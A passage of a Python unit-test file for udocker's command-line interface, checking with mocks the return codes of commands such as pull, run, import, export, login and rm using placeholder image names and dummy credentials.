self.local.return_value = self.mock_lrepo
def tearDown(self):
self.lrepo.stop()
@patch('udocker.cli.LocalFileAPI')
@patch('udocker.cli.KeyStore')
@patch('udocker.cli.DockerIoAPI')
def test_01_init(self, mock_dioapi, mock_ks, mock_lfapi):
"""Test01 UdockerCLI() constructor."""
# Test Config().conf['keystore'] starts with /
Config().conf['keystore'] = "/xxx"
UdockerCLI(self.local)
self.assertTrue(mock_dioapi.called)
self.assertTrue(mock_lfapi.called)
self.assertTrue(mock_ks.called_with(Config().conf['keystore']))
# Test Config().conf['keystore'] does not starts with /
Config().conf['keystore'] = "xx"
UdockerCLI(self.local)
self.assertTrue(mock_ks.called_with(Config().conf['keystore']))
@patch('udocker.cli.FileUtil.isdir')
def test_02__cdrepo(self, mock_isdir):
"""Test02 UdockerCLI()._cdrepo()."""
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc._cdrepo(cmdp)
self.assertFalse(status)
self.assertFalse(mock_isdir.called)
argv = ["udocker"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_isdir.return_value = False
udoc = UdockerCLI(self.local)
status = udoc._cdrepo(cmdp)
self.assertFalse(status)
self.assertTrue(mock_isdir.called)
argv = ["udocker"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_isdir.return_value = True
self.local.setup.return_value = None
udoc = UdockerCLI(self.local)
status = udoc._cdrepo(cmdp)
self.assertTrue(status)
self.assertTrue(self.local.setup.called)
@patch('udocker.cli.DockerIoAPI.is_repo_name')
@patch('udocker.cli.Msg')
def test_03__check_imagespec(self, mock_msg, mock_reponame):
"""Test03 UdockerCLI()._check_imagespec()."""
mock_msg.level = 0
mock_reponame.return_value = False
udoc = UdockerCLI(self.local)
status = udoc._check_imagespec("")
self.assertEqual(status, (None, None))
mock_reponame.return_value = True
udoc = UdockerCLI(self.local)
status = udoc._check_imagespec("AAA")
self.assertEqual(status, ("AAA", "latest"))
mock_reponame.return_value = True
udoc = UdockerCLI(self.local)
status = udoc._check_imagespec("AAA:45")
self.assertEqual(status, ("AAA", "45"))
@patch('udocker.cli.DockerIoAPI.is_repo_name')
@patch('udocker.cli.Msg')
def test_04__check_imagerepo(self, mock_msg, mock_reponame):
"""Test04 UdockerCLI()._check_imagerepo()."""
mock_msg.level = 0
mock_reponame.return_value = False
udoc = UdockerCLI(self.local)
status = udoc._check_imagerepo("")
self.assertEqual(status, None)
mock_reponame.return_value = True
udoc = UdockerCLI(self.local)
status = udoc._check_imagerepo("AAA")
self.assertEqual(status, "AAA")
@patch('udocker.cli.DockerIoAPI.set_index')
@patch('udocker.cli.DockerIoAPI.set_registry')
@patch('udocker.cli.DockerIoAPI.set_proxy')
@patch('udocker.cli.Msg')
def test_05__set_repository(self, mock_msg, mock_proxy,
mock_reg, mock_idx):
"""Test05 UdockerCLI()._set_repository()."""
mock_msg.level = 0
regist = "registry.io"
idxurl = "dockerhub.io"
imgrepo = "dockerhub.io/myimg:1.2"
mock_proxy.return_value = None
mock_reg.side_effect = [None, None, None, None]
mock_idx.side_effect = [None, None, None, None]
udoc = UdockerCLI(self.local)
status = udoc._set_repository(regist, idxurl, imgrepo, True)
self.assertTrue(status)
self.assertTrue(mock_proxy.called)
self.assertTrue(mock_reg.called)
self.assertTrue(mock_idx.called)
regist = ""
idxurl = ""
imgrepo = "https://dockerhub.io/myimg:1.2"
mock_proxy.return_value = None
mock_reg.side_effect = [None, None, None, None]
mock_idx.side_effect = [None, None, None, None]
udoc = UdockerCLI(self.local)
status = udoc._set_repository(regist, idxurl, imgrepo, False)
self.assertTrue(status)
def test_06__split_imagespec(self):
"""Test06 UdockerCLI()._split_imagespec()."""
imgrepo = ""
res = ("", "", "", "")
udoc = UdockerCLI(self.local)
status = udoc._split_imagespec(imgrepo)
self.assertEqual(status, res)
imgrepo = "dockerhub.io/myimg:1.2"
res = ("", "dockerhub.io", "myimg", "1.2")
udoc = UdockerCLI(self.local)
status = udoc._split_imagespec(imgrepo)
self.assertEqual(status, res)
imgrepo = "https://dockerhub.io/myimg:1.2"
res = ("https:", "dockerhub.io", "myimg", "1.2")
udoc = UdockerCLI(self.local)
status = udoc._split_imagespec(imgrepo)
self.assertEqual(status, res)
@patch('udocker.cli.os.path.exists')
@patch('udocker.cli.Msg')
def test_07_do_mkrepo(self, mock_msg, mock_exists):
"""Test07 UdockerCLI().do_mkrepo()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_mkrepo(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_exists.called)
argv = ["udocker", "mkrepo"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = False
self.local.setup.return_value = None
self.local.create_repo.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_mkrepo(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_exists.called)
self.assertTrue(self.local.setup.called)
self.assertTrue(self.local.create_repo.called)
argv = ["udocker", "mkrepo"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = False
self.local.setup.return_value = None
self.local.create_repo.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_mkrepo(cmdp)
self.assertEqual(status, 0)
# def test_08__search_print_lines(self):
# """Test08 UdockerCLI()._search_print_lines()."""
# @patch('udocker.cli.DockerIoAPI.search_get_page')
# @patch('udocker.cli.HostInfo.termsize')
# def test_09__search_repositories(self, mock_termsz, mock_doiasearch):
# """Test09 UdockerCLI()._search_repositories()."""
# repo_list = [{"count": 1, "next": "", "previous": "",
# "results": [
# {
# "repo_name": "lipcomputing/ipyrad",
# "short_description": "Docker to run ipyrad",
# "star_count": 0,
# "pull_count": 188,
# "repo_owner": "",
# "is_automated": True,
# "is_official": False
# }]}]
# mock_termsz.return_value = (40, "")
# mock_doiasearch.return_value = repo_list
# udoc = UdockerCLI(self.local)
# status = udoc._search_repositories("ipyrad")
# self.assertEqual(status, 0)
@patch('udocker.cli.DockerIoAPI.get_tags')
def test_10__list_tags(self, mock_gettags):
"""Test10 UdockerCLI()._list_tags()."""
mock_gettags.return_value = ["t1"]
udoc = UdockerCLI(self.local)
status = udoc._list_tags("t1")
self.assertEqual(status, 0)
mock_gettags.return_value = None
udoc = UdockerCLI(self.local)
status = udoc._list_tags("t1")
self.assertEqual(status, 1)
@patch('udocker.cli.KeyStore.get')
@patch('udocker.cli.DockerIoAPI.set_v2_login_token')
@patch('udocker.cli.DockerIoAPI.search_init')
@patch.object(UdockerCLI, '_search_repositories')
@patch.object(UdockerCLI, '_list_tags')
@patch.object(UdockerCLI, '_split_imagespec')
@patch.object(UdockerCLI, '_set_repository')
def test_11_do_search(self, mock_setrepo, mock_split, mock_listtags,
mock_searchrepo, mock_doiasearch, mock_doiasetv2,
mock_ksget):
"""Test11 UdockerCLI().do_search()."""
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_search(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "search", "--list-tags", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = None
mock_split.return_value = ("d1", "d2", "ipyrad", "d3")
mock_doiasearch.return_value = None
mock_ksget.return_value = "v2token1"
mock_doiasetv2.return_value = None
mock_listtags.return_value = ["t1", "t2"]
udoc = UdockerCLI(self.local)
status = udoc.do_search(cmdp)
self.assertEqual(status, ["t1", "t2"])
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_doiasearch.called)
self.assertTrue(mock_ksget.called)
self.assertTrue(mock_doiasetv2.called)
self.assertTrue(mock_listtags.called)
argv = ["udocker", "search", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = None
mock_split.return_value = ("d1", "d2", "ipyrad", "d3")
mock_doiasearch.return_value = None
mock_ksget.return_value = "v2token1"
mock_doiasetv2.return_value = None
mock_searchrepo.return_value = 0
udoc = UdockerCLI(self.local)
status = udoc.do_search(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_searchrepo.called)
@patch('udocker.cli.Msg')
@patch('udocker.cli.LocalFileAPI.load')
@patch.object(UdockerCLI, '_check_imagerepo')
def test_12_do_load(self, mock_chkimg, mock_load, mock_msg):
"""Test12 UdockerCLI().do_load()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_load(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "load", "-i", "ipyrad", "ipyimg"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_load(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_load.called)
argv = ["udocker", "load", "-i", "ipyrad", "ipyimg"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = True
mock_load.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_load(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_load.called)
argv = ["udocker", "load", "-i", "ipyrad", "ipyimg"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = True
mock_load.return_value = ['docker-repo1', 'docker-repo2']
udoc = UdockerCLI(self.local)
status = udoc.do_load(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.Msg')
@patch('udocker.cli.os.path.exists')
@patch('udocker.cli.LocalFileAPI.save')
@patch.object(UdockerCLI, '_check_imagespec')
def test_13_do_save(self, mock_chkimg, mock_save, mock_exists, mock_msg):
"""Test13 UdockerCLI().do_save()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_save(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "save", "-o", "ipyrad", "ipyimg:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_save(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_exists.called)
self.assertFalse(mock_chkimg.called)
self.assertFalse(mock_save.called)
argv = ["udocker", "save", "-o", "ipyrad", "ipyimg:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = False
mock_chkimg.return_value = ("ipyimg", "latest")
mock_save.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_save(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_save.called)
argv = ["udocker", "save", "-o", "ipyrad", "ipyimg:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_exists.return_value = False
mock_chkimg.return_value = ("ipyimg", "latest")
mock_save.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_save(cmdp)
self.assertTrue(mock_exists.called)
self.assertTrue(mock_chkimg.called)
self.assertTrue(mock_save.called)
self.assertEqual(status, 0)
@patch('udocker.cli.LocalFileAPI.import_toimage')
@patch('udocker.cli.LocalFileAPI.import_tocontainer')
@patch('udocker.cli.LocalFileAPI.import_clone')
@patch('udocker.cli.Msg')
@patch.object(UdockerCLI, '_check_imagespec')
def test_14_do_import(self, mock_chkimg, mock_msg, mock_impclone,
mock_impcont, mock_impimg):
"""Test14 UdockerCLI().do_import()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_import(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_chkimg.called)
self.assertFalse(mock_impclone.called)
self.assertFalse(mock_impcont.called)
self.assertFalse(mock_impimg.called)
argv = ["udocker", "import", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_import(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_chkimg.called)
self.assertFalse(mock_impimg.called)
argv = ["udocker", "import", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_import(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_chkimg.called)
self.assertTrue(mock_impimg.called)
argv = ["udocker", "import", "--clone", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
mock_impclone.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_import(cmdp)
self.assertEqual(status, 0)
self.assertFalse(mock_impcont.called)
self.assertTrue(mock_impclone.called)
argv = ["udocker", "import", "--tocontainer",
"ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
mock_impcont.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_import(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_impcont.called)
@patch('udocker.cli.Msg')
@patch('udocker.cli.ContainerStructure')
def test_15_do_export(self, mock_cs, mock_msg):
"""Test15 UdockerCLI().do_export()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_export(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "export", "-o", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
udoc = UdockerCLI(self.local)
status = udoc.do_export(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "export", "-o", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_cs.return_value.export_tofile.return_value = False
self.local.get_container_id.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_export(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_cs.called)
self.assertTrue(self.local.get_container_id.called)
argv = ["udocker", "export", "-o", "ipyrad.tar", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_cs.return_value.export_tofile.return_value = True
self.local.get_container_id.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_export(cmdp)
self.assertEqual(status, 0)
argv = ["udocker", "export",
"--clone", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_cs.return_value.clone_tofile.return_value = True
self.local.get_container_id.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_export(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.LocalFileAPI.clone_container')
@patch('udocker.cli.Msg')
def test_16_do_clone(self, mock_msg, mock_clone):
"""Test16 UdockerCLI().do_clone()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_clone(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "clone", "ipyradcont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
udoc = UdockerCLI(self.local)
status = udoc.do_clone(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_clone.called)
self.assertTrue(self.local.get_container_id.called)
argv = ["udocker", "clone", "ipyradcont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = "12345"
mock_clone.return_value = "54321"
udoc = UdockerCLI(self.local)
status = udoc.do_clone(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_clone.called)
@patch('udocker.cli.Msg')
@patch('udocker.cli.KeyStore.put')
@patch('udocker.cli.DockerIoAPI.get_v2_login_token')
@patch.object(UdockerCLI, '_set_repository')
def test_17_do_login(self, mock_setrepo, mock_dioalog,
mock_ksput, mock_msg):
"""Test17 UdockerCLI().do_login()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_login(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "login", "--username", "u1",
"--password", "xx"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = True
mock_dioalog.return_value = "zx1"
mock_ksput.return_value = 1
udoc = UdockerCLI(self.local)
status = udoc.do_login(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_dioalog.called)
self.assertTrue(mock_ksput.called)
argv = ["udocker", "login", "--username", "u1",
"--password", "xx"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = None
mock_dioalog.return_value = "zx1"
mock_ksput.return_value = 0
udoc = UdockerCLI(self.local)
status = udoc.do_login(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_dioalog.called)
self.assertTrue(mock_ksput.called)
@patch('udocker.cli.Msg')
@patch('udocker.cli.KeyStore')
@patch.object(UdockerCLI, '_set_repository')
def test_18_do_logout(self, mock_setrepo, mock_ks, mock_msg):
"""Test18 UdockerCLI().do_logout()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_logout(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "logout", "-a"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = None
mock_ks.return_value.erase.return_value = 0
udoc = UdockerCLI(self.local)
status = udoc.do_logout(cmdp)
self.assertEqual(status, 0)
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_ks.return_value.erase.called)
argv = ["udocker", "logout"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_setrepo.return_value = None
mock_ks.return_value.delete.return_value = 1
udoc = UdockerCLI(self.local)
status = udoc.do_logout(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_ks.return_value.delete.called)
@patch.object(UdockerCLI, '_set_repository')
@patch.object(UdockerCLI, '_check_imagespec')
@patch('udocker.cli.DockerIoAPI')
@patch('udocker.cli.KeyStore.get')
@patch('udocker.cli.Msg')
def test_19_do_pull(self, mock_msg, mock_ksget, mock_dioa,
mock_chkimg, mock_setrepo):
"""Test19 UdockerCLI().do_pull()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_pull(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "pull", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
mock_setrepo.return_value = None
mock_ksget.return_value = "zx1"
mock_dioa.return_value.set_v2_login_token.return_value = None
mock_dioa.return_value.get.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_pull(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_chkimg.called)
self.assertTrue(mock_setrepo.called)
self.assertTrue(mock_ksget.called)
self.assertTrue(mock_dioa.return_value.set_v2_login_token.called)
self.assertTrue(mock_dioa.return_value.get.called)
argv = ["udocker", "pull", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
mock_setrepo.return_value = None
mock_ksget.return_value = "zx1"
mock_dioa.return_value.set_v2_login_token.return_value = None
mock_dioa.return_value.get.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_pull(cmdp)
self.assertEqual(status, 0)
@patch.object(UdockerCLI, '_check_imagespec')
@patch('udocker.cli.ContainerStructure')
@patch('udocker.cli.DockerIoAPI')
@patch('udocker.cli.Msg')
def test_20__create(self, mock_msg, mock_dioapi,
mock_cstruct, mock_chkimg):
"""Test20 UdockerCLI()._create()."""
mock_msg.level = 0
mock_dioapi.return_value.is_repo_name.return_value = False
udoc = UdockerCLI(self.local)
status = udoc._create("IMAGE:TAG")
self.assertFalse(status)
self.assertTrue(mock_msg.return_value.err.called)
mock_dioapi.return_value.is_repo_name.return_value = True
mock_chkimg.return_value = ("", "TAG")
mock_cstruct.return_value.create.return_value = True
udoc = UdockerCLI(self.local)
status = udoc._create("IMAGE:TAG")
self.assertFalse(status)
mock_dioapi.return_value.is_repo_name.return_value = True
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_cstruct.return_value.create.return_value = True
udoc = UdockerCLI(self.local)
status = udoc._create("IMAGE:TAG")
self.assertTrue(status)
@patch.object(UdockerCLI, '_create')
@patch('udocker.cli.Msg')
def test_21_do_create(self, mock_msg, mock_create):
"""Test21 UdockerCLI().do_create()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_create(cmdp)
self.assertEqual(status, 1)
self.assertFalse(mock_create.called)
argv = ["udocker", "create", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_create.return_value = ""
udoc = UdockerCLI(self.local)
status = udoc.do_create(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_create.called)
argv = ["udocker", "create", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_create.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_create(cmdp)
self.assertEqual(status, 0)
self.assertFalse(self.local.set_container_name.called)
argv = ["udocker", "create", "--name=mycont", "ipyrad:latest"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_create.return_value = "12345"
self.local.set_container_name.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_create(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.set_container_name.called)
# def test_22__get_run_options(self):
# """Test22 UdockerCLI()._get_run_options()"""
@patch('udocker.cli.ExecutionMode')
@patch('udocker.cli.Msg')
@patch.object(UdockerCLI, 'do_pull')
@patch.object(UdockerCLI, '_create')
@patch.object(UdockerCLI, '_check_imagespec')
def test_23_do_run(self, mock_chkimg, mock_create, mock_pull,
mock_msg, mock_exec):
"""Test23 UdockerCLI().do_run()."""
mock_msg.level = 0
mock_pull.return_value = None
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_run(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "run"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_pull.return_value = None
udoc = UdockerCLI(self.local)
status = udoc.do_run(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "run", "--location=/tmp/udocker", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_pull.return_value = None
mock_exec.return_value.get_engine.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_run(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_exec.return_value.get_engine.called)
mock_pull.return_value = None
exeng_patch = patch("udocker.engine.proot.PRootEngine")
proot = exeng_patch.start()
mock_proot = Mock()
proot.return_value = mock_proot
argv = ["udocker", "run", "--location=/tmp/udocker", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_pull.return_value = None
mock_exec.return_value.get_engine.return_value = proot
proot.run.return_value = 0
udoc = UdockerCLI(self.local)
status = udoc.do_run(cmdp)
self.assertEqual(status, 0)
self.assertTrue(proot.run.called)
self.assertFalse(self.local.isprotected_container.called)
argv = ["udocker", "run", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = ""
mock_pull.return_value = None
mock_exec.return_value.get_engine.return_value = proot
proot.run.return_value = 0
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.cd_imagerepo.return_value = True
mock_create.return_value = "12345"
udoc = UdockerCLI(self.local)
status = udoc.do_run(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.get_container_id.called)
self.assertTrue(mock_chkimg.called)
self.assertTrue(self.local.cd_imagerepo.called)
self.assertTrue(mock_create.called)
exeng_patch.stop()
def test_24_do_images(self):
"""Test24 UdockerCLI().do_images()."""
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_images(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "images", "-l"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_imagerepos.return_value = [("img1", "tag1")]
self.local.isprotected_imagerepo.return_value = False
self.local.cd_imagerepo.return_value = "/img1"
self.local.get_layers.return_value = [("l1", 1024)]
udoc = UdockerCLI(self.local)
status = udoc.do_images(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.get_imagerepos.called)
self.assertTrue(self.local.isprotected_imagerepo.called)
self.assertTrue(self.local.cd_imagerepo.called)
self.assertTrue(self.local.get_layers.called)
@patch('udocker.cli.ExecutionMode')
def test_25_do_ps(self, mock_exec):
"""Test25 UdockerCLI().do_ps()."""
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_ps(cmdp)
self.assertEqual(status, 1)
exeng_patch = patch("udocker.engine.proot.PRootEngine")
proot = exeng_patch.start()
mock_proot = Mock()
proot.return_value = mock_proot
cdir = "/home/u1/.udocker/containers"
argv = ["udocker", "ps", "-m", "-s"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_containers_list.return_value = [[cdir, "/", "a"]]
mock_exec.return_value.get_engine.return_value = proot
self.local.isprotected_container.return_value = False
self.local.iswriteable_container.return_value = True
self.local.get_size.return_value = 1024
udoc = UdockerCLI(self.local)
status = udoc.do_ps(cmdp)
self.assertEqual(status, 0)
exeng_patch.stop()
@patch('udocker.cli.Msg')
def test_26_do_rm(self, mock_msg):
"""Test26 UdockerCLI().do_rm()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "rm"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 1)
self.assertFalse(self.local.get_container_id.called)
argv = ["udocker", "rm", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = None
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.get_container_id.called)
self.assertFalse(self.local.isprotected_container.called)
argv = ["udocker", "rm", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = "12345"
self.local.isprotected_container.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.isprotected_container.called)
self.assertFalse(self.local.del_container.called)
argv = ["udocker", "rm", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = "12345"
self.local.isprotected_container.return_value = False
self.local.del_container.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.del_container.called)
argv = ["udocker", "rm", "mycont"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = "12345"
self.local.isprotected_container.return_value = False
self.local.del_container.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_rm(cmdp)
self.assertEqual(status, 0)
@patch('udocker.cli.Msg')
@patch.object(UdockerCLI, '_check_imagespec')
def test_27_do_rmi(self, mock_chkimg, mock_msg):
"""Test27 UdockerCLI().do_rmi()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_rmi(cmdp)
self.assertEqual(status, 1)
argv = ["udocker", "rmi"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("", "latest")
udoc = UdockerCLI(self.local)
status = udoc.do_rmi(cmdp)
self.assertEqual(status, 1)
self.assertTrue(mock_chkimg.called)
self.assertFalse(self.local.isprotected_imagerepo.called)
argv = ["udocker", "rmi", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.isprotected_imagerepo.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_rmi(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.isprotected_imagerepo.called)
self.assertFalse(self.local.del_imagerepo.called)
argv = ["udocker", "rmi", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.isprotected_imagerepo.return_value = False
self.local.del_imagerepo.return_value = False
udoc = UdockerCLI(self.local)
status = udoc.do_rmi(cmdp)
self.assertEqual(status, 1)
self.assertTrue(self.local.del_imagerepo.called)
argv = ["udocker", "rmi", "ipyrad"]
cmdp = CmdParser()
cmdp.parse(argv)
mock_chkimg.return_value = ("ipyrad", "latest")
self.local.isprotected_imagerepo.return_value = False
self.local.del_imagerepo.return_value = True
udoc = UdockerCLI(self.local)
status = udoc.do_rmi(cmdp)
self.assertEqual(status, 0)
self.assertTrue(self.local.del_imagerepo.called)
@patch('udocker.cli.Msg')
@patch.object(UdockerCLI, '_check_imagespec')
def test_28_do_protect(self, mock_chkimg, mock_msg):
"""Test28 UdockerCLI().do_protect()."""
mock_msg.level = 0
argv = ["udocker", "-h"]
cmdp = CmdParser()
cmdp.parse(argv)
udoc = UdockerCLI(self.local)
status = udoc.do_protect(cmdp)
self.assertEqual(status, 1)
self.assertFalse(self.local.get_container_id.called)
argv = ["udocker", "protect"]
cmdp = CmdParser()
cmdp.parse(argv)
self.local.get_container_id.return_value = False
mock_chkimg.return_value = ("", "latest")
